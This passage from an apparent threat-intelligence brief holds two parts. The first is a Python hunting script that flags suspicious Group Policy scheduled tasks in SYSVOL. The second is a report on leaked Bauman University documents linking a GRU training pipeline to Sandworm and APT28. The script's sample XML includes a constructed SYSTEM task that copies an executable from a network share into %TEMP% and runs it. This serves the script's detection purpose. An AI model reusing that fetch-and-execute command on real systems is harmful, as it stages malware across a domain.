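The first of those W20 priorities, hunting scheduled tasks in SYSVOL, as an added example (not Check Point's detection content). Group Policy Preferences store scheduled tasks in each policy's Machine\Preferences\ScheduledTasks\ScheduledTasks.xml under SYSVOL; the constructed XML below follows that schema (legacy Task with appName/args attributes, ImmediateTaskV2 with Actions/Exec/Command) and the parser returns every task whose command or arguments reference a UNC path or a temp/user-writable directory. A UNC path to NETLOGON or SYSVOL can be legitimate, so each result is a triage lead, not a verdict.

```python
"""Hunt SYSVOL Group Policy Preferences for scheduled tasks that stage a payload.

Added example, not Check Point's detection content. GPP scheduled tasks live at
\\<domain>\SYSVOL\<domain>\Policies\<GUID>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml;
the XML below is constructed to follow that schema. Tasks whose command or arguments
reference a UNC path or a temp/user-writable directory are returned for triage.
"""
import re
import xml.etree.ElementTree as ET

UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\s\"']+")
WRITABLE_DIR = re.compile(
    r"\\Temp\\|\\Windows\\Temp|\\ProgramData\\|\\Users\\Public\\|%TEMP%|%TMP%|%PUBLIC%", re.I)


def _commands(props) -> list:
    """Collect 'command arguments' strings from legacy and V2 task properties."""
    cmds = []
    if props.get("appName"):                        # legacy <Task>: appName/args attributes
        cmds.append(" ".join(filter(None, [props.get("appName"), props.get("args", "")])))
    for ex in props.iter("Exec"):                   # <TaskV2>/<ImmediateTaskV2>: Actions/Exec
        cmds.append(" ".join(filter(None, [ex.findtext("Command", ""), ex.findtext("Arguments", "")])))
    return cmds


def suspicious_gpp_tasks(xml_text: str) -> list:
    """Return one dict per task whose command touches a UNC path or writable directory."""
    root = ET.fromstring(xml_text)
    hits = []
    for task in root:
        props = task.find("Properties")
        if props is None:
            continue
        for cmd in _commands(props):
            reasons = []
            if UNC_PATH.search(cmd):
                reasons.append("unc-path")
            if WRITABLE_DIR.search(cmd):
                reasons.append("writable-dir")
            if reasons:
                hits.append({"type": task.tag, "name": task.get("name"),
                             "runas": props.get("runAs"), "command": cmd, "reasons": reasons})
    return hits


# Constructed ScheduledTasks.xml: a benign agent check, a staged locker, a legacy logon task.
SAMPLE_XML = r"""<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="Inventory check" image="0">
    <Properties action="C" name="Inventory check" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>C:\Program Files\Inventory\agent.exe</Command><Arguments>--check</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="Update" image="0">
    <Properties action="C" name="Update" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>C:\Windows\System32\cmd.exe</Command>
        <Arguments>/c copy \\10.20.4.50\share\svc.exe %TEMP%\svc.exe &amp;&amp; %TEMP%\svc.exe</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <Task clsid="{2DEECB1C-261F-4e13-9B21-16FB83BC03BD}" name="Map drives" image="0">
    <Properties action="C" name="Map drives" runAs="" appName="\\corp.example\SYSVOL\corp.example\scripts\map.bat" args="" startIn=""/>
  </Task>
</ScheduledTasks>"""

if __name__ == "__main__":
    for hit in suspicious_gpp_tasks(SAMPLE_XML):
        print(hit["type"], hit["name"], hit["reasons"], hit["command"])
```

Run it against every Policies\{GUID} directory in SYSVOL and also diff the results against the previous day's run: the propagation pattern described above depends on a task that did not exist yesterday, typically created as ImmediateTaskV2 so it fires at the next Group Policy refresh rather than on a schedule, and with runAs set to SYSTEM.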

Bauman University "Department No. 4" — leaked GRU cyber-operator training pipeline reveals direct line to Sandworm and APT28 operations against European targets

From CTI Daily Brief — 2026-05-10 · published 2026-05-10

A six-publisher investigative consortium (The Insider, The Guardian, Le Monde, Der Spiegel, VSquare, Frontstory) published more than 2 000 leaked internal documents from Bauman Moscow State Technical University on 2026-05-07 detailing a structured GRU recruitment-and-training pipeline operating under the cover of "Department No. 4 — Special Training" (Meduza (English), 2026-05-07 · The Guardian, 2026-05-07 · Le Monde, 2026-05-07 · Der Spiegel, 2026-05-07 · heise online, 2026-05-07). Each year 10–15 graduates are placed directly into Russian military intelligence units. The 144-hour core curriculum, labelled in the documents "Countering Technical Intelligence", covers password attacks, CVE-driven exploitation using Metasploit against US DoD network architectures by name, custom trojan development, DDoS methodologies, penetration testing against Western targets, computer-virus construction, and propaganda/manipulation training. Candidates are physically assessed at a mandatory training camp; each placement requires explicit GRU approval.

The leaked assignment records explicitly link graduates to GRU Unit 74455 (Sandworm / VoodooBear — responsible for the 2015–2016 Ukraine power-grid attacks, 2017 NotPetya global wiper, and 2023 Kyivstar telecom outage) and to APT28 (Fancy Bear — responsible for the 2016 Bundestag hack and the 2017 Macron campaign breach, with continuing 2025–2026 activity against EU government and election-adjacent targets). For European defenders the salient operational point is that the curriculum trains specifically against Western and US-DoD topologies — meaning the training pipeline is producing operators whose default mental model of a target network is a NATO-aligned environment, not a generic enterprise. The investigation does not change short-term defensive priorities but reframes the long-running attribution debate: GRU cyber units are not ad-hoc-recruited contractors, they are graduates of a structured technical-intelligence training stream with measurable annual throughput.